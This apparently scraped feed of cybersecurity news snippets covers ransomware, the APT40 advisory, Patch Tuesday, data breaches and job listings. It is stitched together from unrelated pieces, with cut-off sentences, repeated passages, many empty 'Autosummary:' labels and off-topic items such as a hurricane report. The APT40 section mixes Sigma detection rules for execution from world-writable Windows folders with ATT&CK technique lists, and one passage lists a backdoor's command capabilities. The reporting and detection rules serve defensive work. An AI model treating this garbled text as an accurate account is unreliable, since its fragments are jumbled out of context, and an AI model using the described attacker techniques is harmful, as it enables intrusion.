4. Establish a formal process that includes external industry experts and advisors for additional review, insights, and recommendations in early design and architecture phases, version releases, and during events where cybersecurity may impact overall trust by customers.Position the new team to spearhead or contribute with authority in discussions with media, regulators, governments, and partners when articulating the overall security strategy, risk/benefit discussions, and holistic approach for cybersecurity to enhance the trust of customers.Technical cybersecurity architects, engineers, and developers play a key role in making sure a product is coded securely, but they are not inherently adept at understanding how such solutions will create problems across the ecosystem when misused, compromised, or manipulated.A strategic cybersecurity leadership team must be established to work closely with every product and service division to help them avoid cybersecurity pitfalls and innovate, to increase the overall competitive advantage value of security, privacy, safety, and trust in those products. Just weeks after Brad Smith, the Vice Chairman and President of Microsoft, spoke before Congress and offered assurances, came another embarrassment: Microsoft allowed some of its security certificates to expire for its Office products, and its customers received security alerts from anti-malware agents that blocked the activities for the expired certificates. "In this Help Net Security interview, Koma Gandy, VP of Leadership and Business at Skillsoft, addresses the critical aspects of the cybersecurity skills gap, the need for diverse talent and continuous upskilling in areas like AI and cloud computing. Gandy advocates training that combines technical expertise with essential power skills to meet evolving industry demands and secure future career opportunities in cybersecurity. What are the primary factors contributing to the cybersecurity skills gap? Are there … More
The post Exploring the root causes of the cybersecurity skills gap appeared first on Help Net Security.
"Autosummary:
As technologies change and new challenges arise, it’s paramount that organizations and talent take a holistic approach to skills, investing in power skills like interpersonal communication, problem solving, executive presence and creative thinking, along with technical skills and knowledge of how bad actors exploit threat vectors to proactively defend the organization against potential threats, and how to communicate incidents and responses in ways that different audiences can understand (e.g. C-suite, Board, etc.) An effective training program should be multi-modal, involving virtual, on-demand courses, as well as interactive, AI-driven, and instructor-led elements.In this Help Net Security interview, Koma Gandy, VP of Leadership and Business at Skillsoft, addresses the critical aspects of the cybersecurity skills gap, the need for diverse talent and continuous upskilling in areas like AI and cloud computing. "Autosummary:
" The adversarial collective, also known as Bronze Mohawk, Gingham Typhoon (formerly Gadolinium), ISLANDDREAMS, Kryptonite Panda, Leviathan, Red Ladon, TA423, and TEMP.Periscope, is known to be active since at least 2013, carrying out cyber attacks targeting entities in the Asia-Pacific region. "Autosummary:
"Align adds a new exfiltration prevention feature to its Align Guardian Managed Detection and Response offering, powered by Adlumin. This innovation is designed to detect and stop attackers from exfiltrating data, providing a defense against modern ransomware tactics that employ double-extortion techniques. The new ransomware and exfiltration prevention feature complements Guardian’s existing ransomware prevention capabilities, which already stop ransomware encryption fast enough to save 99% of files. This comprehensive approach now protects organizations from both … More
The post Align strengthens defense against double-extortion ransomware tactics appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Avast released a decryptor for DoNex Ransomware and its predecessors Pierluigi Paganini July 09, 2024 July 09, 2024 Avast developed and released a decryptor for the DoNex ransomware family that allows victims to recover their files for free. "Autosummary:
Evolve has active partnerships with other entities, including Shopify, Plaid, Stripe, and Mercury, but those companies have not yet disclosed whether the Lockbit ransomware incident impacted them. "Autosummary:
Someone with a "thick Eastern-European accent" who claimed to be a middle-man for the BlackSuit ransomware gang has called journalists and NHLS staff members demanding a ransom payment and denying that the group had any intention to cause casualties: "The NHLS was given an opportunity to solve this problem and foolishly tried to withdraw the server data. "A new critical security vulnerability in the RADIUS protocol, dubbed BlastRADIUS, leaves most networking equipment open to Man-in-the-Middle (MitM) attacks. While the vulnerability can be difficult to exploit, the possible impact of an exploit is substantial. What’s at stake? To protect businesses from BlastRADIUS, “every network switch, router, firewall, VPN concentrator, access point, and DSL gateway worldwide needs to be updated to add integrity and authentication checks for these packets,” explains Alan DeKok, CEO of … More
The post Critical vulnerability in the RADIUS protocol leaves networking equipment open to attack appeared first on Help Net Security.
"Autosummary:
To protect businesses from BlastRADIUS, “every network switch, router, firewall, VPN concentrator, access point, and DSL gateway worldwide needs to be updated to add integrity and authentication checks for these packets,” explains Alan DeKok, CEO of InkBridge Networks and one of the foremost experts on RADIUS servers. PAP CHAP MS-CHAPv2 Other non-EAP authentication methods Systems deemed not vulnerable 802.1x IPSec TLS Eduroam OpenRoaming DeKok and his team also maintain the open-source FreeRADIUS project and participate in the IETF standards development. "Chinese state-sponsored cyber group APT40 is amazingly fast at adapting public proof-of-concept (PoC) exploits for vulnerabilities in widely used software, an advisory released by intelligence and cybersecurity agencies from eight countries warns. The group, which is also known as Kryptonite Panda and Gingham Typhoon and is believed to be sponsored by the China’s Ministry of State Security, is expected to continue with this modus operandi, “using POCs for new high-profile vulnerabilities within hours or days … More
The post Chinese APT40 group swifly leverages public PoC exploits appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" RADIUS, short for Remote Authentication Dial-In User Service, is a client/server protocol that provides centralized authentication, authorization, and accounting (AAA) management for users who connect and use a network service. "Autosummary:
" While access to Script Console is typically limited only to authenticated users with administrative permissions, misconfigured Jenkins instances could inadvertently make the "/script" (or "/scriptText") endpoint accessible over the internet, making it ripe for exploitation by attackers looking to run dangerous commands. "Autosummary:
The number of bugs in each vulnerability category is listed below: 26 Elevation of Privilege Vulnerabilities 24 Security Feature Bypass Vulnerabilities 59 Remote Code Execution Vulnerabilities 9 Information Disclosure Vulnerabilities 17 Denial of Service Vulnerabilities 7 Spoofing Vulnerabilities To learn more about the non-security updates released today, you can review our dedicated articles on the new Windows 11 KB5040435 update and Windows 10 KB5040427 update. "Autosummary:
"Autosummary:
"Autosummary:
🚨🚨🚨 #DataLeak 🚨🚨🚨 🇺🇸#USA: Twilio Authy, Truist Bank, Neiman Marcus: Millions of customers" data allegedly leaked Twilio Authy – 33 million phone details (data includes account ID, phone number, device lock, account status, device count) Truist Bank – 65k employee IBM… pic.twitter.com/gkZc7C5OL9 — HackManac (@H4ckManac) June 28, 2024 🚨🚨🚨Major #DataBreach 🚨🚨🚨 🇺🇸#USA: "Autosummary:
The former president"s lawyer, Paulo Cunha, posted on social media that heads of state "have no direct or indirect influence" on what happens to official gifts. "Autosummary:
"Autosummary:
"For July 2024 Patch Tuesday, Microsoft has released security updates and patches that fix 142 CVEs, including two exploited zero-days (CVE-2024-38080, CVE-2024-38112) in Windows Hyper-V and Windows MSHTML Platform (respectively). Zero-days exploited in the wild (CVE-2024-38080, CVE-2024-38112) CVE-2024-38080 is a integer overflow or wraparound bug affecting Hyper-V, Windows’ native hypervisor for creating virtual machines on systems running Windows and Windows Server. Successful exploitation may allow attackers to gain SYSTEM privileges on the host machine, but … More
The post Microsoft fixes two zero-days exploited by attackers (CVE-2024-38080, CVE-2024-38112) appeared first on Help Net Security.
"Autosummary:
Zero-days exploited in the wild (CVE-2024-38080, CVE-2024-38112) CVE-2024-38080 is a integer overflow or wraparound bug affecting Hyper-V, Windows’ native hypervisor for creating virtual machines on systems running Windows and Windows Server. "Autosummary:
“Evolve Bank & Trust is making retail bank customers and financial technology partners’ customers (end users) aware of a cybersecurity incident that may involve certain personal information, as well as the actions we have taken in response, and additional steps individuals may take.” reads the notice of Cybersecurity Incident. "Autosummary:
Scammers gonna scam scam scam, so before hunting for your tickets to a Taylor Swift gig or other in-demand events, learn how to stop fraudsters from leaving a blank space in your bank account Thanks to advances in technology, buying tickets to your favorite show has probably never been easier – as long as you can sometimes endure virtual queues and you’re not a Swiftie, of course. They’ll pressure you into full payment – likely by bank transfer, Zelle, Venmo, etc. or even gift card. 4. Replicated tickets/duplicate listings Scammers look for individuals reselling their tickets online, who have posted pics of those tickets. If you can’t resist buying via social media, steer clear of sellers with no details in their bio, few followers, and who tend to only post about ticket sales. "In this Help Net Security interview, Rob Greer, VP and GM of the Enterprise Security Group at Broadcom, discusses the impact of nation-state cyber attacks on public sector services and citizens, as well as the broader implications for trust and infrastructure. Greer also discusses common vulnerabilities in government IT systems and the potential of AI and public-private collaborations to enhance cybersecurity defenses. How do nation-state attacks affect the public sector and services provided to citizens? … More
The post How nation-state cyber attacks disrupt public services and undermine citizen trust appeared first on Help Net Security.
"Autosummary:
In 2017, the WannaCry attack, which spread to 150 countries across the world, disrupted the UK NHS, limiting ambulance service, patient appointments, medical tests and results, and forcing the closure of various facilities.In this Help Net Security interview, Rob Greer, VP and GM of the Enterprise Security Group at Broadcom, discusses the impact of nation-state cyber attacks on public sector services and citizens, as well as the broader implications for trust and infrastructure. "Autosummary:
"A cryptographic weakness in the DoNex ransomware and its previous incarnations – Muse, fake LockBit 3.0, and DarkRace – has allowed Avast researchers to create a decryptor for files encrypted by all those ransomware variants. DoNex ransom note (Source: Avast) “In cooperation with law enforcement organizations, we have been silently providing the decryptor to DoNex ransomware victims since March 2024,” the company’s Threat Research Team has shared on Monday. About DoNex The DoNex ransomware actor … More
The post Decryptor for DoNex, Muse, DarkRace, (fake) LockBit 3.0 ransomware released appeared first on Help Net Security.
"Autosummary:
After downloading the decryptor, victims need to provide a list of drives, folders, and files that need to be decrypted, as well as an encrypted file and the same file in its original form. "Autosummary:
Mekotio, known to be actively put to use since 2015, is known to target Latin American countries like Brazil, Chile, Mexico, Spain, Peru, and Portugal with an aim to steal banking credentials. "Autosummary:
“ The vulnerability impacts the following devices: MDS 9000 Series Multilayer Switches (CSCwj97007) Nexus 3000 Series Switches (CSCwj97009) Nexus 5500 Platform Switches (CSCwj97011) Nexus 5600 Platform Switches (CSCwj97011) Nexus 6000 Series Switches (CSCwj97011) Nexus 7000 Series Switches (CSCwj94682) * Nexus 9000 Series Switches in standalone NX-OS mode (CSCwj97009) Cisco recommends customers monitor the use of credentials for the administrative users network-admin and vdc-admin. "Autosummary:
"Autosummary:
Eldorado is the latest in the list of new double-extortion ransomware players that have sprung up in recent times, including Arcus Media, AzzaSec, dan0n, Limpopo (aka SOCOTRA, FORMOSA, SEXi), LukaLocker, Shinra, and Space Bears once again highlighting the enduring and persistent nature of the threat. "Autosummary:
The Questions As a CISO, asking yourself these five key questions can help you bridge the board/executive communication gap, present a clear picture of cybersecurity posture, and gain the support needed to effectively manage risk: 1. The Numbers Speak Despite this clear and pressing need for communication, recent research by Heidrick and Struggles, leading executive search, and corporate culture consulting services, revealed a worrying disconnect between CISOs and CEOs.Recognizing your team"s successes boosts organizational morale, fosters a culture of security awareness, and highlights the value of cybersecurity investments.A company board deserves clear, concise information tied to business goals, not technical details about fixes or attack methods. "Autosummary:
Location of recent DoNex ransomware victims Source: Avast Weakness in cryptography During the DoNex ransomware"s execution, an encryption key is generated using the "CryptGenRandom()" function, initializing a ChaCha20 symmetric key used to encrypt the target"s files. "Autosummary:
Ghostscript comes pre-installed on many Linux distributions and is used by various document conversion software, including ImageMagick, LibreOffice, GIMP, Inkscape, Scribus, and the CUPS printing system. "Autosummary:
It also supports a range of commands retrieved from the C2, including: Shell command execution using the "ShellExecuteExW" API Copy, move, rename, or delete files Receive a shellcode from the pipe and inject it into any process by allocating memory and creating a new thread in a remote process Receive a PE file, create a section, and map it into the remote process Create a process using COM interfaces Create a process as a dedicated user Create a new service or modify an existing service Add new network users or remove legitimate users from the system Overall, the CloudSorcerer backdoor is a potent tool that enables the threat actors to perform malicious actions on the infected machines. "Autosummary:
"Autosummary:
"Autosummary:
Researchers at Codean Labs discovered six vulnerabilities (CVE-2024-29510, CVE-2024-29509, CVE-2024-29506, CVE-2024-29507, CVE-2024-29508, CVE-2024-29511) that were addressed with versions 10.03.0 and 10.03.1. “If your distribution does not provide the latest Ghostscript version, it might still have released a patch version containing a fix for this vulnerability (e.g., Debian, Ubuntu, Fedora).” wrote the experts. "Autosummary:
In a separate incident notification published on its website, Neiman Marcus revealed that the data exposed in the attack included names, contact information (e.g., email and postal addresses, and phone numbers), dates of birth, gift card info, transaction data, partial credit card (without expiration dates or CVVs) and Social Security numbers, and employee identification numbers. "This advisory, authored by the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), the United States Cybersecurity and Infrastructure Security Agency (CISA), the United States National Security Agency (NSA), the United States Federal Bureau of Investigation (FBI), the United Kingdom National Cyber Security Centre (NCSC-UK), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), the German Federal Intelligence Service (BND) and Federal Office for the Protection of the Constitution (BfV), the Republic of Korea’s National Intelligence Service (NIS) and NIS’ National Cyber Security Center, and Japan’s National Center of Incident Readiness and Strategy for Cybersecurity (NISC) and National Policy Agency (NPA)—hereafter referred to as the “authoring agencies”—outlines a People’s Republic of China (PRC) state-sponsored cyber group and their current threat to Australian networks. The advisory draws on the authoring agencies’ shared understanding of the threat as well as ASD’s ACSC incident response investigations.
The PRC state-sponsored cyber group has previously targeted organizations in various countries, including Australia and the United States, and the techniques highlighted below are regularly used by other PRC state-sponsored actors globally. Therefore, the authoring agencies believe the group, and similar techniques remain a threat to their countries’ networks as well.
The authoring agencies assess that this group conduct malicious cyber operations for the PRC Ministry of State Security (MSS). The activity and techniques overlap with the groups tracked as Advanced Persistent Threat (APT) 40 (also known as Kryptonite Panda, GINGHAM TYPHOON, Leviathan and Bronze Mohawk in industry reporting). This group has previously been reported as being based in Haikou, Hainan Province, PRC and receiving tasking from the PRC MSS, Hainan State Security Department.[1]
The following Advisory provides a sample of significant ca "
Autosummary:
writable_path: Image|contains: ":\\$Recycle.Bin\\" ":\\AMD\\Temp\\" ":\\Intel\\" ":\\PerfLogs\\" ":\\Windows\\addins\\" ":\\Windows\\appcompat\\" ":\\Windows\\apppatch\\" ":\\Windows\\AppReadiness\\" ":\\Windows\\bcastdvr\\" ":\\Windows\\Boot\\" ":\\Windows\\Branding\\" ":\\Windows\\CbsTemp\\" ":\\Windows\\Containers\\" ":\\Windows\\csc\\" ":\\Windows\\Cursors\\" ":\\Windows\\debug\\" ":\\Windows\\diagnostics\\" ":\\Windows\\DigitalLocker\\" ":\\Windows\\dot3svc\\" ":\\Windows\\en-US\\" ":\\Windows\\Fonts\\" ":\\Windows\\Globalization\\" ":\\Windows\\Help\\" ":\\Windows\\IdentityCRL\\" ":\\Windows\\IME\\" ":\\Windows\\ImmersiveControlPanel\\" ":\\Windows\\INF\\" ":\\Windows\\intel\\" ":\\Windows\\L2Schemas\\" ":\\Windows\\LiveKernelReports\\" ":\\Windows\\Logs\\" ":\\Windows\\media\\" ":\\Windows\\Migration\\" ":\\Windows\\ModemLogs\\" ":\\Windows\\ms\\" ":\\Windows\\OCR\\" ":\\Windows\\panther\\" ":\\Windows\\Performance\\" ":\\Windows\\PLA\\" ":\\Windows\\PolicyDefinitions\\" ":\\Windows\\Prefetch\\" ":\\Windows\\PrintDialog\\" ":\\Windows\\Provisioning\\" ":\\Windows\\Registration\\CRMLog\\" ":\\Windows\\RemotePackages\\" ":\\Windows\\rescache\\" ":\\Windows\\Resources\\" ":\\Windows\\SchCache\\" ":\\Windows\\schemas\\" ":\\Windows\\security\\" ":\\Windows\\ServiceState\\" ":\\Windows\\servicing\\" ":\\Windows\\Setup\\" ":\\Windows\\ShellComponents\\" ":\\Windows\\ShellExperiences\\" ":\\Windows\\SKB\\" ":\\Windows\\TAPI\\" ":\\Windows\\Tasks\\" ":\\Windows\\TextInput\\" ":\\Windows\\tracing\\" ":\\Windows\\Vss\\" ":\\Windows\\WaaS\\" ":\\Windows\\Web\\" ":\\Windows\\wlansvc\\" ":\\Windows\\System32\\Com\\dmp\\" ":\\Windows\\System32\\FxsTmp\\" ":\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" ":\\Windows\\System32\\Speech\\" ":\\Windows\\System32\\spool\\drivers\\color\\" ":\\Windows\\System32\\spool\\PRINTERS\\" ":\\Windows\\System32\\spool\\SERVERS\\" ":\\Windows\\System32\\Tasks_Migrated\\Microsoft\\Windows\\PLA\\System\\" ":\\Windows\\System32\\Tasks\\" ":\\Windows\\SysWOW64\\Com\\dmp\\" ":\\Windows\\SysWOW64\\FxsTmp\\" ":\\Windows\\SysWOW64\\Tasks\\" appdata: Image|contains: "\\AppData\\" User: "SYSTEM" condition: writable_path and not appdata False positives: Allowlist auditing applications have been observed running executables from these directories.References: Process Execution from an Unusual Directory Author: ASD’s ACSC Date: 2024/06/19 Status: experimental Tags: tlp.green classification.au.official attack.execution Log Source: category: process_creation product: windows Detection: temp: Image|startswith: "C:\\Windows\\Temp\\" common_temp_path: Image|re|ignorecase: "C:\\Windows\\Temp\\\{[a-fA-F0-9]{8}-([a-fA-F0-9]{4}-){3}[a-fA-F0-9]{12}\}\\" system_user: User: "SYSTEM" "NETWORK SERVICE" dismhost: Image|endswith: "dismhost.exe" known_parent: ParentImage|endswith: "\\esif_uf.exe" "\\vmtoolsd.exe" "\\cwainstaller.exe" "\\trolleyexpress.exe" condition: temp and not (common_temp_path or system_user or dismhost or known_parent) False positives: Allowlist auditing applications have been observed running executables from Temp.References: Process Execution from an Unusual Directory Author: ASD’s ACSC Date: 2024/06/19 Status: experimental Tags: tlp.green classification.au.official attack.execution Log source: category: process_creation product: windows Detection: users: Image|contains: ":\\Users\\All Users\\" ":\\Users\\Contacts\\" ":\\Users\\Default\\" ":\\Users\\Public\\" ":\\Users\\Searches\\" appdata: Image|contains: "\\AppData\\" User: "SYSTEM" condition: users and not appdata False positives: It is plausible that scripts and administrative tools used in the monitored environment(s) may be located in Public or a subdirectory and should be addressed on a case-by-case basis. Execution T1059 – Command and Scripting Interpreter (regarding command execution through the web shell) T1072 – Software Deployment Tools (regarding the actor using open-source tool Secure Socket Funnelling (SSF) to connect to an IP) Persistence T1505.003 – Server Software Component: Web Shell (regarding use of a web shell and SSF to establish access) Credential Access T1552.001 – Credentials from Password Stores (regarding password files relating to building management system [BMS]) T1558.003 – Steal or Forge Kerberos Tickets: Kerberoasting (regarding attack to gain network credentials) Lateral movement T1021.002 – Remote Services: SMB Shares (regarding the actor mounting SMB shares from multiple devices) Collection T1213 – Data from Information Repositories (regarding manuals/documentation found on the BMS server) Exfiltration T1041 – Exfiltration Over C2 Channel (regarding the actor’s data exfiltration from Active Directory and mounting shares)This advisory, authored by the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), the United States Cybersecurity and Infrastructure Security Agency (CISA), the United States National Security Agency (NSA), the United States Federal Bureau of Investigation (FBI), the United Kingdom National Cyber Security Centre (NCSC-UK), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), the German Federal Intelligence Service (BND) and Federal Office for the Protection of the Constitution (BfV), the Republic of Korea’s National Intelligence Service (NIS) and NIS’ National Cyber Security Center, and Japan’s National Center of Incident Readiness and Strategy for Cybersecurity (NISC) and National Policy Agency (NPA)—hereafter referred to as the “authoring agencies”—outlines a People’s Republic of China (PRC) state-sponsored cyber group and their current threat to Australian networks.References: mattifestation / WorldWritableDirs.txt Process Execution from an Unusual Directory Author: ASD’s ACSC Date: 2024/06/19 Status: experimental Tags: tlp.green classification.au.official attack.execution Log source: category: process_creation product: windows Detection:[T1098] Valid Accounts: Cloud Accounts [T1078.004] Valid Accounts: Domain Accounts [T1078.002] Privilege Escalation (TA0004) Scheduled Task/Job: At [T1053.002] Create or Modify System Process:Proxy: Multi-hop Proxy [T1090.003] Protocol Tunnelling [T1572] Web Service: Bidirectional Communication [T1102.002] Encrypted Channel [T1573] Encrypted Channel: Asymmetric Cryptography [T1573.002] Ingress Tool Transfer Key actor activity observed by the ASD’s ACSC included: Host enumeration, which enables an actor to build their own map of the network; Exploitation of internet-facing applications and web shell use, giving the actor an initial foothold on the network and a capability to execute commands; Exploitation of software vulnerabilities to escalate privileges; and Credential collection to enable lateral movement. From July to August, key actor activity observed by the ASD’s ACSC included: Host enumeration, which enables an actor to build their own map of the network; Web shell use, giving the actor an initial foothold on the network and a capability to execute commands; and Deployment of other tooling leveraged by the actor for malicious purposes.Python [T1059.006] Scheduled Task/Job: At [T1053.002] Command and Scripting Interpreter: JavaScript [T1059.007] Scheduled Task/Job: Scheduled Task [T1053.005] APT40 rapidly exploits newly public vulnerabilities in widely used software such as Log4J (CVE-2021-44228), Atlassian Confluence (CVE-2021-31207, CVE-2021-26084) and Microsoft Exchange (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473).Hijack Execution Flow: DLL Search Order Hijacking [T1574.001] Scheduled Task/Job: Cron [T1053.003] Hijack Execution Flow: DLL Side-Loading [T1574.002] Account Manipulation[T1587.002] Compromise Infrastructure [T1584] Develop Capabilities: Digital Certificates [T1587.003] Develop Capabilities: Malware [T1587.001]Unix Shell Configuration Modification [T1546.004] Process Injection: Dynamic-link Library Injection [T1055.001] Valid Accounts: Domain Accounts [T1078.002] Valid Accounts: Local AccountsLevel: high Title: World Writable Execution - Users ID: 6dda3843-182a-4214-9263-925a80b4c634 Description: Detect process execution from C:\Users\Public\* and other world writable folders within Users. Credential access T1056.003 Input Capture: Web Portal Capture Evidence on the compromised appliance showed that the actor had captured several hundred username-password pairs, in clear text, which are believed to be legitimate. The ASD’s ACSC assesses the following techniques and tactics to be relevant to the actor’s malicious activity: Reconnaissance T1594 – Search Victim-Owned Websites The actor enumerated the custom web application’s website to identify opportunities for accessing the network.Level: low Title: World Writable Execution - Non-Temp System Subdirectory ID: 5b187157-e892-4fc9-84fc-aa48aff9f997 Description:Masquerading: Match Legitimate Name or Location [T1036.005] Virtualisation/Sandbox Evasion: System Checks [T1497.001] Process Injection: Thread Execution Hijacking [T1055.003] Details Beginning in July, actors were able to test and exploit a custom web application [T1190] running on <webapp>2-ext , which enables the group to establish a foothold in the network demilitarized zone (DMZ). Figure 1: TTP Flowchart for APT40 activity This group appears to prefer exploiting vulnerable, public-facing infrastructure over techniques that require user interaction, such as phishing campaigns, and places a high priority on obtaining valid credentials to enable a range of follow-on activities. This initial access method is considered the most likely due to the following: The server was vulnerable to these CVEs at the time; Attempts to exploit these vulnerabilities from known actor infrastructure; and The first known internal malicious activity occurred shortly after attempted exploitation attempts were made. Using their access to the compromised appliance, the group collected genuine usernames, passwords [T1003], and MFA token values [T1111].However, it is likely that actors had access to all files on the compromised appliance, including the captured credentials [T1003], MFA token values [T1111], and JWTs described above.Attempted or successful malicious activity known to have impacted the internal organization’s network segment includes actor access to VDI-related artefacts, the scraping of an internal SQL server [T1505.001], and unexplained traffic observed going from known malicious IP addresses through the access gateway appliances [TA0011].[T1043] Web Service: One-way Communication [T1102.003] Application Layer Protocol: Web Protocols [T1071.001] Ingress Tool TransferAny reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies.Level: medium Mitigations Logging During ASD’s ACSC investigations, a common issue that reduces the effectiveness and speed of investigative efforts is a lack of comprehensive and historical logging information across a number of areas including web server request logs, Windows event logs and internet proxy logs. APT40 has embraced the global trend of using compromised devices, including small-office/home-office (SOHO) devices, as operational infrastructure and last-hop redirectors [T1584.008] for its operations in Australia. "Autosummary:
Those early chatbots "tended to be simpler, with limited conversational abilities," says Colin van Noordt, a researcher on the use of AI in government, and based in the Netherlands.But the emergence of generative AI in the last two years, has revived a vision of more efficient public service, where human-like advisors can work all hours, replying to questions over benefits, taxes and other areas where the government interacts with the public.“If Bürokratt does not know the answer, the chat will be handed over to customer support agent, who will take over the chat and will answer manually,” says Kai Kallas, head of the Personal Services Department at Estonia’s Information System Authority. "Autosummary:
"Autosummary:
"Over the past six months, there has been a notable surge in Android financial threats – malware targeting victims’ mobile banking funds, whether in the form of ‘traditional’ banking malware or, more recently, cryptostealers, according to ESET. Vidar infostealer targets Windows users Infostealing malware can now be found impersonating generative AI tools, and new mobile malware GoldPickaxe is capable of stealing facial recognition data to create deepfake videos used by the malware’s operators to authenticate … More
The post Infostealing malware masquerading as generative AI tools appeared first on Help Net Security.
"Autosummary:
Over the past six months, there has been a notable surge in Android financial threats – malware targeting victims’ mobile banking funds, whether in the form of ‘traditional’ banking malware or, more recently, cryptostealers, according to ESET. "The explosion of Internet of Things (IoT) devices has brought about a wide range of security and privacy challenges, according to Bitdefender and NETGEAR. The report is based on global telemetry of 3.8 million homes and 50 million IoT devices that generated 9.1 billion security events over the course of 12 months. High vulnerabilities found in TVs, smart plugs, DVRs With over 15 billion connected devices globally, from smart home appliances to industrial equipment, the … More
The post 99% of IoT exploitation attempts rely on previously known CVEs appeared first on Help Net Security.
"Autosummary:
Across all device types, denial of service (DoS) attacks appear to be the most common type of vulnerability, with significant percentages observed for TV sets (36.7%), smart plugs (22.2%), DVRs (17.7%), routers (13.4%), and set-top boxes (6.9%). "Autosummary:
"Autosummary:
The gang has already claimed 16 victims, most of them in the U.S., in real estate, educational, healthcare, and manufacturing sectors. "Autosummary:
Mexico"s coast battered by Hurricane Beryl 1 hour ago By Ian Aikman , BBC News Share Hurricane Beryl due to strengthen again after making landfall in Yucatan Peninsula Hurricane Beryl has been lashing Mexico"s Yucatán Peninsula after wreaking havoc across the Caribbean. "Autosummary:
"Autosummary:
Rejetto HFS 2.3m Source: ASEC Observed attacks AhnLab SEcurity Intelligence Center (ASEC) observed attacks on version 2.3m of HFS, which continues to be very popular among individual users, small teams, educational institutions, and developers that want to test file sharing over a network. "Autosummary:
“In late June, a threat actor named ShinyHunters leaked a CSV text file containing what they claim are 33 million phone numbers registered with the Authy service.” "Autosummary:
“The Company does not currently believe the incident will have a material adverse effect on its business, operations, or financial results.” continues the Form 8-K. “The Company believes it holds adequate cybersecurity insurance for this incident and will also be seeking recourse from the Partner.” "Autosummary:
“The National Data Protection Authority (ANPD) issued today a Preventive Measure determining the immediate suspension, in Brazil, of the validity of the new privacy policy of the company Meta , which authorized the use of personal data published on its platforms for the purpose of training artificial intelligence (AI) systems.” reads the announcement published by ANPD. "Autosummary:
Yes, and it"s much more likely that a member of staff outside your cybersecurity team finds themselves in the prickly position of acting as a negotiator, unlike a demand that arrives via an email or a ransom note dropped by the cybercriminals on your compromised network. Whereas many ransomware attacks see a company"s company"s data exfiltrated by attackers, and the threat made that stolen data will be sold to other cybercriminals or released to the public, the Volcano Demon gang... Security researchers at Halcyon, which has reported seeing at least two successful attacks perpetrated by Volcano Demon in the last week, say that the calls can be threatening in nature and come from unidentified caller-ID numbers. "CISO Atera | Israel | On-site – View job details The CISO will oversee our company’s information, cyber, and technology security and will have end to end full responsibility developing, implementing, and enforcing security policies, procedures, and protocols to protect critical data. Cyber Defense Specialist Explora Journeys | Italy | On-site – View job details As a Cyber Defense Specialist, you will operate and optimize security tooling/products, including security email gateway, firewall, IDS/IPS, web security … More
The post Cybersecurity jobs available right now: July 3, 2024 appeared first on Help Net Security.
"Autosummary:
Responsibilities include: managing the delivery of technical security assurance testing to our clients, from initial project scoping, test execution and reporting; Delivering cybersecurity testing services, such as but not limited to penetration testing services (including web App, Mobile App, and network), vulnerability assessments, phishing campaigns, and red teaming exercises; Undertaking security assessments of technical Infrastructure including, for example: M365, Google Cloud, Azure, AWS, backups, Networks.Do the Consulting for local PCT on IT related technical issues on security aspects of process automation systems (e.g. domains, network segmentation, ICS upgrade, time synchronization, license management, firewalls, patching, server hardening, SIEM, PAM, remote access, network monitoring, etc.). Cyber Defense Specialist Explora Journeys | Italy | On-site – View job details As a Cyber Defense Specialist, you will operate and optimize security tooling/products, including security email gateway, firewall, IDS/IPS, web security gateway, emergency detect and response, logging and auditing, event and incident management, privileged access management and authentication.Determine cyber threat resource requirements, availability, adequacy, and define gap between cyber threat emulation capability and the actual threat Senior Security Architect II Electronic Arts | Canada | Hybrid – View job details As a >Senior Security Architect II, you will lead complex design assessments on EA user generated experience (UGX) products hosted in the Cloud and running on PC, web, mobile, and consoles, identifying and driving the remediation of security and gameplay integrity issues.CISO Atera | Israel | On-site – View job details The CISO will oversee our company’s information, cyber, and technology security and will have end to end full responsibility developing, implementing, and enforcing security policies, procedures, and protocols to protect critical data. "Most companies do not know how effectively they are investing money to fight the cybersecurity threat, according to Optiv. Cybersecurity budgets are increasing and cyber incidents are rampant, and yet only a small percentage of respondents have a formal approach to determining cybersecurity budgets, which can lead to inefficiencies and missed opportunities to address critical security gaps. Lack of formal approach to cybersecurity budgets Based on an independent Ponemon Institute survey, the report reveals a … More
The post Companies spend more on cybersecurity but struggle to track expenses appeared first on Help Net Security.
"Autosummary:
More companies are leveraging AI in the form of use and prevention: 44% of respondents use AI/ML to prevent cyberattacks 35% purchased use-case specific tools 31% use existing tools 34% use automated processes and audits “Our independent research for Optiv reveals the positive steps organizations are taking to reduce risk, while also addressing the challenges they face in the evolving cyber threat landscape,” said Dr. Larry Ponemon, chairman and founder of the Ponemon Institute. "Autosummary:
"Autosummary:
"Autosummary:
Unknown threat actors have been observed exploiting a now-patched security flaw in Microsoft MSHTML to deliver a surveillance tool called MerkSpy as part of a campaign primarily targeting users in Canada, India, Poland, and the U.S. "MerkSpy is designed to clandestinely monitor user activities, capture sensitive information, and establish persistence on compromised systems," Fortinet FortiGuard Labs researcher Cara Lin said in a report published last week. "Autosummary:
"FakeBat primarily aims to download and execute the next-stage payload, such as IcedID, Lumma, RedLine, SmokeLoader, SectopRAT, and Ursnif," the company said in a Tuesday analysis. "Autosummary:
Polish government investigates Russia-linked cyberattack on state news agency Pierluigi Paganini July 03, 2024 July 03, 2024 The Polish government is investigating a potential connection between Russia and a cyberattack on the country’s state news agency. "Autosummary:
Money transfer service and payment platform builder Wise also published a statement on its website, informing customers it had shared full names, addresses, contact details, Social Security numbers, and other sensitive information with Evolve as part of a partnership between 2020 and 2023. In a form 8-K, submitted to the Securities and Exchange Commission (SEC), Affirm states: “Because the Company [Affirm Holdings, Inc] shares the Personal Information of Affirm Card users with Evolve to facilitate the issuance and servicing of Affirm Cards, the Company believes that the Personal Information of Affirm Card users was compromised as part of Evolve’s cybersecurity incident.” Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Accounts linked to known CSAM sites Source: Recorded Future As information-stealing malware steals all credentials saved in a browser, the researchers were able to link CSAM account holders to their legal online accounts, such as email, banking, online shopping, mobile carriers, and social media. "Autosummary:
